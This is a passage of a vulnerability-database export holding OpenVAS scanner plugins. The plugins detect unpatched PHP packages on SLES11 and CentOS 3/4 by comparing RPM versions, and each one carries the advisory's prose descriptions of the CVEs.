be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=480948\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=471419\");\n script_id(65637);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES11: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~50.18.3\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:55:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880871", "href": "http://plugins.openvas.org/nasl.php?oid=880871", "type": "openvas", "title": "CentOS Update for php CESA-2009:0337 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2009:0337 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Web server.\n\n A heap-based buffer overflow flaw was found in PHP's mbstring extension. A\n remote attacker able to pass arbitrary input to a PHP script using mbstring\n conversion functions could cause the PHP interpreter to crash or,\n possibly, execute arbitrary code. (CVE-2008-5557)\n \n A flaw was found in the handling of the "mbstring.func_overload"\n configuration setting. A value set for one virtual host, or in a user's\n .htaccess file, was incorrectly applied to other virtual hosts on the same\n server, causing the handling of multibyte character strings to not work\n correctly. (CVE-2009-0754)\n \n A buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\n script allowed a remote attacker to load a carefully crafted font file, it\n could cause the PHP interpreter to crash or, possibly, execute arbitrary\n code. (CVE-2008-3658)\n \n A flaw was found in the way PHP handled certain file extensions when\n running in FastCGI mode. If the PHP interpreter was being executed via\n FastCGI, a remote attacker could create a request which would cause the PHP\n interpreter to crash. (CVE-2008-3660)\n \n A memory disclosure flaw was found in the PHP gd extension's imagerotate\n function. A remote attacker able to pass arbitrary values as the\n "background color" argument of the function could, possibly, view portions\n of the PHP interpreter's memory. (CVE-2008-5498)\n \n All php users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. The httpd web server\n must be restarted for the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 3\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-April/015722.html\");\n script_id(880871);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:0337\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_name(\"CentOS Update for php CESA-2009:0337 centos3 i386\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880938", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880938", "type": "openvas", "title": "CentOS Update for php CESA-2009:0337 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2009:0337 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-April/015806.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880938\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:0337\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_name(\"CentOS Update for php CESA-2009:0337 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"php on CentOS 4\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Web server.\n\n A heap-based buffer overflow flaw was found in PHP's mbstring extension. A\n remote attacker able to pass arbitrary input to a PHP script using mbstring\n conversion functions could cause the PHP interpreter to crash or,\n possibly, execute arbitrary code. (CVE-2008-5557)\n\n A flaw was found in the handling of the 'mbstring.func_overload'\n configuration setting. A value set for one virtual host, or in a user's\n .htaccess file, was incorrectly applied to other virtual hosts on the same\n server, causing the handling of multibyte character strings to not work\n correctly. (CVE-2009-0754)\n\n A buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\n script allowed a remote attacker to load a carefully crafted font file, it\n could cause the PHP interpreter to crash or, possibly, execute arbitrary\n code. (CVE-2008-3658)\n\n A flaw was found in the way PHP handled certain file extensions when\n running in FastCGI mode. If the PHP interpreter was being executed via\n FastCGI, a remote attacker could create a request which would cause the PHP\n interpreter to crash. (CVE-2008-3660)\n\n A memory disclosure flaw was found in the PHP gd extension's imagerotate\n function. A remote attacker able to pass arbitrary values as the\n 'background color' argument of the function could, possibly, view portions\n of the PHP interpreter's memory. (CVE-2008-5498)\n\n All php users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. The httpd web server\n must be restarted for the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880938", "href": "http://plugins.openvas.org/nasl.php?oid=880938", "type": "openvas", "title": "CentOS Update for php CESA-2009:0337 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2009:0337 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Web server.\n\n A heap-based buffer overflow flaw was found in PHP's mbstring extension. A\n remote attacker able to pass arbitrary input to a PHP script using mbstring\n conversion functions could cause the PHP interpreter to crash or,\n possibly, execute arbitrary code. (CVE-2008-5557)\n \n A flaw was found in the handling of the "mbstring.func_overload"\n configuration setting. A value set for one virtual host, or in a user's\n .htaccess file, was incorrectly applied to other virtual hosts on the same\n server, causing the handling of multibyte character strings to not work\n correctly. (CVE-2009-0754)\n \n A buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\n script allowed a remote attacker to load a carefully crafted font file, it\n could cause the PHP interpreter to crash or, possibly, execute arbitrary\n code. (CVE-2008-3658)\n \n A flaw was found in the way PHP handled certain file extensions when\n running in FastCGI mode. If the PHP interpreter was being executed via\n FastCGI, a remote attacker could create a request which would cause the PHP\n interpreter to crash. (CVE-2008-3660)\n \n A memory disclosure flaw was found in the PHP gd extension's imagerotate\n function. A remote attacker able to pass arbitrary values as the\n "background color" argument of the function could, possibly, view portions\n of the PHP interpreter's memory. (CVE-2008-5498)\n \n All php users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. The httpd web server\n must be restarted for the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-April/015806.html\");\n script_id(880938);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:0337\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_name(\"CentOS Update for php CESA-2009:0337 centos4 i386\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. 